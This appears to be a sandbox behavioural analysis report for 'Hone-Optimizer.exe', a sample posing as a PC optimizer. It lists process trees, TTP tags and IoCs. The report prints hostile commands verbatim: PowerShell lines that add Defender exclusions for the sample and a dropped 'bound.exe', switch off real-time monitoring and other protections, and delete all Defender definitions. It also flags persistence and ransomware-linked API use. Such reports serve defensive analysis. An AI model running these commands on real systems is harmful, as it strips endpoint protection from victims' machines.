PID 3632 wrote to memory of 4932	3632	Hone-Optimizer.exe	85
PID 3632 wrote to memory of 2148	3632	Hone-Optimizer.exe	88
PID 3632 wrote to memory of 2148	3632	Hone-Optimizer.exe	88
PID 3632 wrote to memory of 4572	3632	Hone-Optimizer.exe	89
PID 3632 wrote to memory of 4572	3632	Hone-Optimizer.exe	89
PID 3632 wrote to memory of 1780	3632	Hone-Optimizer.exe	91
PID 3632 wrote to memory of 1780	3632	Hone-Optimizer.exe	91
PID 3632 wrote to memory of 3192	3632	Hone-Optimizer.exe	94
PID 3632 wrote to memory of 3192	3632	Hone-Optimizer.exe	94
PID 4932 wrote to memory of 2452	4932	cmd.exe	96
PID 4932 wrote to memory of 2452	4932	cmd.exe	96
PID 3088 wrote to memory of 5112	3088	cmd.exe	97
PID 3088 wrote to memory of 5112	3088	cmd.exe	97
PID 2148 wrote to memory of 1772	2148	cmd.exe	98
PID 2148 wrote to memory of 1772	2148	cmd.exe	98
PID 1780 wrote to memory of 1212	1780	cmd.exe	99
PID 1780 wrote to memory of 1212	1780	cmd.exe	99
PID 3192 wrote to memory of 2008	3192	cmd.exe	100
PID 3192 wrote to memory of 2008	3192	cmd.exe	100
PID 4572 wrote to memory of 3276	4572	cmd.exe	101
PID 4572 wrote to memory of 3276	4572	cmd.exe	101
PID 3276 wrote to memory of 1872	3276	bound.exe	104
PID 3276 wrote to memory of 1872	3276	bound.exe	104
PID 1872 wrote to memory of 1184	1872	cmd.exe	105
PID 1872 wrote to memory of 1184	1872	cmd.exe	105
PID 1872 wrote to memory of 1744	1872	cmd.exe	107
PID 1872 wrote to memory of 1744	1872	cmd.exe	107
PID 3632 wrote to memory of 4244	3632	Hone-Optimizer.exe	108
PID 3632 wrote to memory of 4244	3632	Hone-Optimizer.exe	108
PID 1872 wrote to memory of 3964	1872	cmd.exe	110
PID 1872 wrote to memory of 3964	1872	cmd.exe	110
PID 1872 wrote to memory of 4808	1872	cmd.exe	111
PID 1872 wrote to memory of 4808	1872	cmd.exe	111
PID 4244 wrote to memory of 1508	4244	cmd.exe	112
PID 4244 wrote to memory of 1508	4244	cmd.exe	112
PID 1872 wrote to memory of 2532	1872	cmd.exe	161
PID 1872 wrote to memory of 2532	1872	cmd.exe	161
PID 3632 wrote to memory of 1004	3632	Hone-Optimizer.exe	114
PID 3632 wrote to memory of 1004	3632	Hone-Optimizer.exe	114
PID 1872 wrote to memory of 4820	1872	cmd.exe	162
PID 1872 wrote to memory of 4820	1872	cmd.exe	162
PID 1004 wrote to memory of 4248	1004	cmd.exe	117
PID 1004 wrote to memory of 4248	1004	cmd.exe	117
PID 3632 wrote to memory of 4412	3632	Hone-Optimizer.exe	118
PID 3632 wrote to memory of 4412	3632	Hone-Optimizer.exe	118
PID 4412 wrote to memory of 4476	4412	cmd.exe	120
PID 4412 wrote to memory of 4476	4412	cmd.exe	120
PID 3632 wrote to memory of 1236	3632	Hone-Optimizer.exe	121
PID 3632 wrote to memory of 1236	3632	Hone-Optimizer.exe	121
PID 4932 wrote to memory of 4240	4932	cmd.exe	123
PID 4932 wrote to memory of 4240	4932	cmd.exe	123
PID 1236 wrote to memory of 4692	1236	cmd.exe	124
PID 1236 wrote to memory of 4692	1236	cmd.exe	124
PID 3632 wrote to memory of 3776	3632	Hone-Optimizer.exe	125
PID 3632 wrote to memory of 3776	3632	Hone-Optimizer.exe	125
PID 3632 wrote to memory of 4748	3632	Hone-Optimizer.exe	126
PID 3632 wrote to memory of 4748	3632	Hone-Optimizer.exe	126
PID 3776 wrote to memory of 216	3776	cmd.exe	129
PID 3776 wrote to memory of 216	3776	cmd.exe	129

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3656	attrib.exe
5024	attrib.exe

cURL User-Agent 7 IoCs

Uses User-Agent string associated with cURL utility.

description	flow	ioc
HTTP User-Agent header	96	curl/8.7.1
HTTP User-Agent header	34	curl/8.7.1
HTTP User-Agent header	62	curl/8.7.1
HTTP User-Agent header	69	curl/8.7.1
HTTP User-Agent header	70	curl/8.7.1
HTTP User-Agent header	93	curl/8.7.1
HTTP User-Agent header	95	curl/8.7.1

C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe
"C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2292
- C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe
  "C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3088
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4932
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2452
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:4240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2148
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4572
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3276
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6E5A.tmp\6E5B.tmp\6E5C.bat C:\Users\Admin\AppData\Local\Temp\bound.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1872
      - C:\Windows\system32\mode.com
        
        Mode 130,45
        6⤵
        
        PID:1184
      - C:\Windows\system32\reg.exe
        
        reg add HKLM /F
        6⤵
        Modifies registry key
        
        PID:1744
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Control\CrashControl" /v "DisplayParameters" /t REG_DWORD /d "1" /f
        6⤵
        
        PID:3964
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"
        6⤵
        
        PID:4808
      - C:\Windows\system32\reg.exe
        
        reg add HKCU\CONSOLE /v VirtualTerminalLevel /t REG_DWORD /d 1 /f
        6⤵
        Modifies registry key
        
        PID:2532
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "Disclaimer"
        6⤵
        
        PID:4820
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Hone" /v "Disclaimer" /f
        6⤵
        
        PID:1976
      - C:\Windows\system32\curl.exe
        
        curl -g -L -# -o "C:\Users\Admin\AppData\Local\Temp\Updater.bat" "https://raw.githubusercontent.com/auraside/HoneCtrl/main/Files/HoneCtrlVer"
        6⤵
        
        PID:2132
      - C:\Windows\system32\Dism.exe
        
        dism /online /enable-feature /featurename:MicrosoftWindowsWMICore /NoRestart
        6⤵
        Drops file in Windows directory
        
        PID:3372
        
        C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe {3F511729-BF4E-4763-8326-9B58EB2EF9F5}
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:2840
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f
        6⤵
        
        PID:1384
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\', 'D:\', 'E:\', 'F:\', 'G:\'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3688
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Unrestricted -NoProfile Checkpoint-Computer -Description 'Hone Restore Point'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4304
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c date /t
        6⤵
        
        PID:3648
      - C:\Windows\system32\reg.exe
        
        reg export HKCU C:\Hone\HoneRevert\11.14.2024\HKLM.reg /y
        6⤵
        
        PID:3584
      - C:\Windows\system32\reg.exe
        
        reg export HKCU C:\Hone\HoneRevert\11.14.2024\HKCU.reg /y
        6⤵
        
        PID:1752
      - C:\Windows\system32\mode.com
        
        Mode 130,45
        6⤵
        
        PID:4368
      - C:\Windows\System32\choice.exe
        
        C:\Windows\System32\choice.exe /c:1234567XD /n /m " Select a corresponding number to the options above > "
        6⤵
        
        PID:4828
      - C:\Windows\system32\mode.com
        
        Mode 130,45
        6⤵
        
        PID:4988
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
        6⤵
        
        PID:1900
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get PNPDeviceID
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4560
        
        C:\Windows\system32\findstr.exe
        
        findstr /L "VEN_"
        7⤵
        
        PID:3996
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
        6⤵
        
        PID:3836
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:4168
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
        6⤵
        
        PID:1364
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
        6⤵
        
        PID:5076
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_NetworkAdapter get PNPDeviceID
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3100
        
        C:\Windows\system32\findstr.exe
        
        findstr /L "VEN_"
        7⤵
        
        PID:2368
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
        6⤵
        
        PID:3844
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:3988
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
        6⤵
        
        PID:872
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
        6⤵
        
        PID:1508
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get TotalVisibleMemorySize /value
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4676
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
        6⤵
        
        PID:3244
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
        7⤵
        
        PID:712
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NVTTweaks"
        6⤵
        
        PID:5092
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
        6⤵
        
        PID:3596
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
        7⤵
        
        PID:544
        
        C:\Windows\system32\findstr.exe
        
        findstr "HKEY"
        7⤵
        
        PID:4948
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
        6⤵
        
        PID:2952
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:2860
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
        6⤵
        
        PID:2224
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:116
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
        6⤵
        
        PID:1168
      - C:\Windows\system32\find.exe
        
        find "0x0"
        6⤵
        
        PID:3248
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
        6⤵
        
        PID:3272
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:1108
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
        6⤵
        
        PID:560
      - C:\Windows\system32\find.exe
        
        find "0x0"
        6⤵
        
        PID:3168
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
        6⤵
        
        PID:4652
      - C:\Windows\system32\find.exe
        
        find "0x4"
        6⤵
        
        PID:3936
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
        6⤵
        
        PID:1276
      - C:\Windows\system32\find.exe
        
        find "0x3"
        6⤵
        
        PID:2160
      - C:\Windows\system32\powercfg.exe
        
        powercfg /GetActiveScheme
        6⤵
        Power Settings
        
        PID:2728
      - C:\Windows\system32\find.exe
        
        find "Hone"
        6⤵
        
        PID:1660
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
        6⤵
        
        PID:3524
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NpiTweaks"
        6⤵
        
        PID:460
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "TCPIP"
        6⤵
        
        PID:2956
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
        6⤵
        
        PID:5060
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "MemoryTweaks"
        6⤵
        
        PID:1308
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "InternetTweaks"
        6⤵
        
        PID:4708
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "ServicesTweaks"
        6⤵
        
        PID:700
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "DebloatTweaks"
        6⤵
        
        PID:4020
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
        6⤵
        
        PID:4536
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "AffinityTweaks"
        6⤵
        
        PID:844
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
        6⤵
        
        PID:4304
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
        6⤵
        
        PID:3648
      - C:\Windows\system32\find.exe
        
        find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
        6⤵
        
        PID:3264
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
        6⤵
        
        PID:3584
      - C:\Windows\system32\find.exe
        
        find "0x400"
        6⤵
        
        PID:1164
      - C:\Windows\system32\sc.exe
        
        sc query STR
        6⤵
        Launches sc.exe
        
        PID:3740
      - C:\Windows\system32\find.exe
        
        find "RUNNING"
        6⤵
        
        PID:2364
      - C:\Windows\system32\sc.exe
        
        sc query HoneAudio
        6⤵
        Launches sc.exe
        
        PID:896
      - C:\Windows\system32\find.exe
        
        find "RUNNING"
        6⤵
        
        PID:4968
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_Battery Get BatteryStatus
        6⤵
        
        PID:3340
      - C:\Windows\system32\find.exe
        
        find "1"
        6⤵
        
        PID:4568
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value
        6⤵
        
        PID:2376
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_VideoController get VideoProcessor /value
        7⤵
        
        PID:1076
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:1716
      - C:\Windows\system32\find.exe
        
        find "GeForce"
        6⤵
        
        PID:4988
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:924
      - C:\Windows\system32\find.exe
        
        find "NVIDIA"
        6⤵
        
        PID:5116
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:4444
      - C:\Windows\system32\find.exe
        
        find "RTX"
        6⤵
        
        PID:3996
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:1760
      - C:\Windows\system32\find.exe
        
        find "GTX"
        6⤵
        
        PID:4168
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:2840
      - C:\Windows\system32\find.exe
        
        find "AMD"
        6⤵
        
        PID:4276
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:4024
      - C:\Windows\system32\find.exe
        
        find "Ryzen"
        6⤵
        
        PID:3724
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:3328
      - C:\Windows\system32\find.exe
        
        find "Intel"
        6⤵
        
        PID:3844
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:1384
      - C:\Windows\system32\find.exe
        
        find "UHD"
        6⤵
        
        PID:872
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo [91mOFF "
        6⤵
        
        PID:3964
      - C:\Windows\system32\find.exe
        
        find "N/A"
        6⤵
        
        PID:1508
      - C:\Windows\system32\curl.exe
        
        curl -g -k -L -# -o "C:\Hone\Resources\HoneV2.pow" "https://github.com/auraside/HoneCtrl/raw/main/Files/HoneV2.pow"
        6⤵
        
        PID:712
      - C:\Windows\system32\powercfg.exe
        
        powercfg /d 44444444-4444-4444-4444-444444444449
        6⤵
        Power Settings
        
        PID:224
      - C:\Windows\system32\powercfg.exe
        
        powercfg -import "C:\Hone\Resources\HoneV2.pow" 44444444-4444-4444-4444-444444444449
        6⤵
        Power Settings
        
        PID:3688
      - C:\Windows\system32\powercfg.exe
        
        powercfg /changename 44444444-4444-4444-4444-444444444449 "Hone Ultimate Power Plan V2" "The Ultimate Power Plan to increase FPS, improve latency and reduce input lag."
        6⤵
        Power Settings
        
        PID:4348
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic cpu get numberOfCores /value
        6⤵
        
        PID:4460
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic cpu get numberOfCores /value
        7⤵
        
        PID:4636
      - C:\Windows\system32\powercfg.exe
        
        powercfg -setacvalueindex 44444444-4444-4444-4444-444444444449 sub_processor IDLEDISABLE 0
        6⤵
        Power Settings
        
        PID:4220
      - C:\Windows\system32\powercfg.exe
        
        powercfg -setacvalueindex 44444444-4444-4444-4444-444444444449 sub_processor IDLEDISABLE 0
        6⤵
        Power Settings
        
        PID:1116
      - C:\Windows\system32\powercfg.exe
        
        powercfg -setactive "44444444-4444-4444-4444-444444444449"
        6⤵
        Power Settings
        
        PID:4484
      - C:\Windows\system32\mode.com
        
        Mode 130,45
        6⤵
        
        PID:4224
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
        6⤵
        
        PID:1548
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get PNPDeviceID
        7⤵
        
        PID:2336
        
        C:\Windows\system32\findstr.exe
        
        findstr /L "VEN_"
        7⤵
        
        PID:1204
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
        6⤵
        
        PID:1544
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:3936
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
        6⤵
        
        PID:2348
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
        6⤵
        
        PID:4356
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_NetworkAdapter get PNPDeviceID
        7⤵
        
        PID:1440
        
        C:\Windows\system32\findstr.exe
        
        findstr /L "VEN_"
        7⤵
        
        PID:3476
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
        6⤵
        
        PID:3788
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:2496
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
        6⤵
        
        PID:4412
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
        6⤵
        
        PID:1220
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get TotalVisibleMemorySize /value
        7⤵
        
        PID:4748
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
        6⤵
        
        PID:3348
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
        7⤵
        
        PID:4380
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NVTTweaks"
        6⤵
        
        PID:4188
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
        6⤵
        
        PID:3648
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
        7⤵
        
        PID:4540
        
        C:\Windows\system32\findstr.exe
        
        findstr "HKEY"
        7⤵
        
        PID:3004
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
        6⤵
        
        PID:3792
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:1752
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
        6⤵
        
        PID:4592
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:3728
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
        6⤵
        
        PID:2728
      - C:\Windows\system32\find.exe
        
        find "0x0"
        6⤵
        
        PID:1396
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
        6⤵
        
        PID:4628
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:4468
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
        6⤵
        
        PID:4048
      - C:\Windows\system32\find.exe
        
        find "0x0"
        6⤵
        
        PID:4828
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
        6⤵
        
        PID:2376
      - C:\Windows\system32\find.exe
        
        find "0x4"
        6⤵
        
        PID:4136
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
        6⤵
        
        PID:4988
      - C:\Windows\system32\find.exe
        
        find "0x3"
        6⤵
        
        PID:1976
      - C:\Windows\system32\powercfg.exe
        
        powercfg /GetActiveScheme
        6⤵
        Power Settings
        
        PID:5116
      - C:\Windows\system32\find.exe
        
        find "Hone"
        6⤵
        
        PID:1900
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
        6⤵
        
        PID:3996
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NpiTweaks"
        6⤵
        
        PID:3404
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "TCPIP"
        6⤵
        
        PID:4168
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
        6⤵
        
        PID:4064
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "MemoryTweaks"
        6⤵
        
        PID:4276
